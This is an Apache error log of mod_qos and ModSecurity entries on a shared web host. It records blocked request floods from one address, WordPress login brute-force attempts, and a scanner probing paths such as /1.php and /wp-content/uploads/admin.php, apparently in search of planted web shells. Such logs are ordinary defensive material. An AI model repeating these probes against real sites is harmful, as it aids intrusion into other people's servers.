[Tue May 26 19:59:58.981479 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5GAAAAAA
[Tue May 26 19:59:58.981802 2026] [qos:error] [pid 93576:tid 93770] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5GQAAADo
[Tue May 26 19:59:58.982429 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:57890] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZmDRMqfxdEDkosz5GgAAABY
[Tue May 26 19:59:59.061401 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5GwAAAFY
[Tue May 26 19:59:59.268901 2026] [security2:error] [pid 106517:tid 106737] [client 103.163.220.25:41569] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/"] [unique_id "ahWuZ4ZZc2DoU1lPnP1V9AAAANs"]
[Tue May 26 19:59:59.276148 2026] [security2:error] [pid 93576:tid 93784] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4kAAAAEg"]
[Tue May 26 19:59:59.280475 2026] [security2:error] [pid 93576:tid 93715] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4qgAAAAM"]
[Tue May 26 19:59:59.288534 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4mgAAAEk"]
[Tue May 26 19:59:59.289432 2026] [security2:error] [pid 93576:tid 93753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4lwAAACk"]
[Tue May 26 19:59:59.293971 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VkAAAAJQ"]
[Tue May 26 19:59:59.306763 2026] [security2:error] [pid 93576:tid 93764] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4ogAAADQ"]
[Tue May 26 19:59:59.309346 2026] [security2:error] [pid 93576:tid 93836] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4tAAAAHw"]
[Tue May 26 19:59:59.320767 2026] [security2:error] [pid 106517:tid 106776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VkwAAAQI"]
[Tue May 26 19:59:59.322663 2026] [security2:error] [pid 106517:tid 106742] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VlgAAAOA"]
[Tue May 26 19:59:59.330589 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VkQAAAM8"]
[Tue May 26 19:59:59.334436 2026] [security2:error] [pid 106517:tid 106649] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VnAAAAIU"]
[Tue May 26 19:59:59.334494 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VmAAAAMY"]
[Tue May 26 19:59:59.346019 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4rgAAAA8"]
[Tue May 26 19:59:59.359653 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4mwAAAFw"]
[Tue May 26 19:59:59.359775 2026] [security2:error] [pid 106517:tid 106758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VtgAAAPA"]
[Tue May 26 19:59:59.368143 2026] [security2:error] [pid 106517:tid 106761] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VlwAAAPM"]
[Tue May 26 19:59:59.368413 2026] [security2:error] [pid 93576:tid 93740] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz40wAAABw"]
[Tue May 26 19:59:59.368911 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VuAAAAPw"]
[Tue May 26 19:59:59.371116 2026] [security2:error] [pid 93576:tid 93812] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz4wQAAAGQ"]
[Tue May 26 19:59:59.372481 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VsgAAAOI"]
[Tue May 26 19:59:59.372808 2026] [security2:error] [pid 106517:tid 106681] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VkgAAAKM"]
[Tue May 26 19:59:59.378532 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VtQAAANk"]
[Tue May 26 19:59:59.380237 2026] [security2:error] [pid 106517:tid 106739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VuwAAAN0"]
[Tue May 26 19:59:59.380986 2026] [security2:error] [pid 106517:tid 106693] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VuQAAAK8"]
[Tue May 26 19:59:59.384451 2026] [security2:error] [pid 106517:tid 106653] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VsQAAAIg"]
[Tue May 26 19:59:59.384810 2026] [security2:error] [pid 106517:tid 106697] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VtAAAALM"]
[Tue May 26 19:59:59.412341 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VvQAAAOY"]
[Tue May 26 19:59:59.414764 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VxwAAAKg"]
[Tue May 26 19:59:59.417949 2026] [security2:error] [pid 106517:tid 106711] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VwAAAAME"]
[Tue May 26 19:59:59.422600 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VxgAAAQQ"]
[Tue May 26 19:59:59.423152 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz42AAAAA0"]
[Tue May 26 19:59:59.426890 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZoZZc2DoU1lPnP1VugAAAM0"]
[Tue May 26 19:59:59.427365 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuZmDRMqfxdEDkosz44QAAAH8"]
[Tue May 26 19:59:59.547571 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZ4ZZc2DoU1lPnP1WPQAAAJo
[Tue May 26 19:59:59.551472 2026] [qos:error] [pid 106517:tid 106732] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuZ4ZZc2DoU1lPnP1WPwAAANY
[Tue May 26 19:59:59.578534 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5TAAAABw
[Tue May 26 19:59:59.582245 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5TwAAAF4
[Tue May 26 19:59:59.582346 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5TgAAACo
[Tue May 26 19:59:59.584435 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5UQAAAEU
[Tue May 26 19:59:59.584556 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5UAAAAEo
[Tue May 26 19:59:59.585299 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5UgAAAAg
[Tue May 26 19:59:59.587025 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5UwAAAGQ
[Tue May 26 19:59:59.680440 2026] [security2:error] [pid 106517:tid 106551] [remote 35.176.253.230:46172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.253.176.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WIQAArh8"]
[Tue May 26 19:59:59.703099 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5VAAAAD8
[Tue May 26 19:59:59.707965 2026] [qos:error] [pid 106517:tid 106778] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ4ZZc2DoU1lPnP1WSgAAAQQ
[Tue May 26 19:59:59.726587 2026] [qos:error] [pid 93576:tid 93744] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5VwAAACA
[Tue May 26 19:59:59.731046 2026] [qos:error] [pid 93576:tid 93824] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5WAAAAHA
[Tue May 26 19:59:59.734003 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5WQAAAHQ
[Tue May 26 19:59:59.736752 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5WgAAAAM
[Tue May 26 19:59:59.737823 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5WwAAAGo
[Tue May 26 19:59:59.739416 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5XAAAAF8
[Tue May 26 19:59:59.741599 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5XQAAAAQ
[Tue May 26 19:59:59.768563 2026] [security2:error] [pid 106517:tid 106670] [client 103.163.220.38:51937] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/1.php"] [unique_id "ahWuZ4ZZc2DoU1lPnP1WSwAAAJk"]
[Tue May 26 19:59:59.799558 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:54228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5XgAAAHI
[Tue May 26 19:59:59.945005 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5YAAAAA0
[Tue May 26 19:59:59.949489 2026] [qos:error] [pid 106517:tid 106773] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ4ZZc2DoU1lPnP1WTwAAAP8
[Tue May 26 19:59:59.949917 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:54228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5YQAAAH8
[Tue May 26 19:59:59.954336 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5YgAAAEk
[Tue May 26 19:59:59.955999 2026] [qos:error] [pid 93576:tid 93723] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5YwAAAAs
[Tue May 26 19:59:59.960092 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5ZAAAAAU
[Tue May 26 19:59:59.960197 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5ZQAAADA
[Tue May 26 19:59:59.960258 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5ZgAAADU
[Tue May 26 19:59:59.962177 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5ZwAAAHM
[Tue May 26 19:59:59.963279 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuZ2DRMqfxdEDkosz5aAAAAHU
[Tue May 26 20:00:00.074676 2026] [security2:error] [pid 93576:tid 93666] [remote 50.6.207.27:54138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuaGDRMqfxdEDkosz5bAAAe1U"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:00:00.097282 2026] [qos:error] [pid 93576:tid 93740] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5bQAAABw
[Tue May 26 20:00:00.099235 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:54228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5bgAAAF4
[Tue May 26 20:00:00.103401 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaIZZc2DoU1lPnP1WVgAAAJo
[Tue May 26 20:00:00.105265 2026] [qos:error] [pid 93576:tid 93754] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5bwAAACo
[Tue May 26 20:00:00.107434 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5cAAAAEU
[Tue May 26 20:00:00.112058 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5cQAAAEo
[Tue May 26 20:00:00.113930 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5cgAAAAg
[Tue May 26 20:00:00.116467 2026] [qos:error] [pid 93576:tid 93812] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5cwAAAGQ
[Tue May 26 20:00:00.116960 2026] [qos:error] [pid 93576:tid 93712] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5dAAAAAA
[Tue May 26 20:00:00.117721 2026] [qos:error] [pid 93576:tid 93775] [client 45.148.10.120:58000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5dQAAAD8
[Tue May 26 20:00:00.249410 2026] [qos:error] [pid 93576:tid 93715] [client 45.148.10.120:35126] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5dwAAAAM
[Tue May 26 20:00:00.249415 2026] [qos:error] [pid 93576:tid 93828] [client 45.148.10.120:54228] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5dgAAAHQ
[Tue May 26 20:00:00.254101 2026] [qos:error] [pid 93576:tid 93818] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5eAAAAGo
[Tue May 26 20:00:00.257607 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaIZZc2DoU1lPnP1WXQAAAM0
[Tue May 26 20:00:00.259148 2026] [qos:error] [pid 93576:tid 93807] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5eQAAAF8
[Tue May 26 20:00:00.260679 2026] [security2:error] [pid 93576:tid 93716] [client 103.163.220.49:32299] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/admin.php"] [unique_id "ahWuaGDRMqfxdEDkosz5egAAAAQ"]
[Tue May 26 20:00:00.263804 2026] [qos:error] [pid 93576:tid 93831] [client 45.148.10.120:57842] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5ewAAAHc
[Tue May 26 20:00:00.265504 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5fAAAABU
[Tue May 26 20:00:00.270220 2026] [qos:error] [pid 93576:tid 93782] [client 45.148.10.120:34966] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5fQAAAEY
[Tue May 26 20:00:00.270957 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:57894] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuaGDRMqfxdEDkosz5fgAAAHk
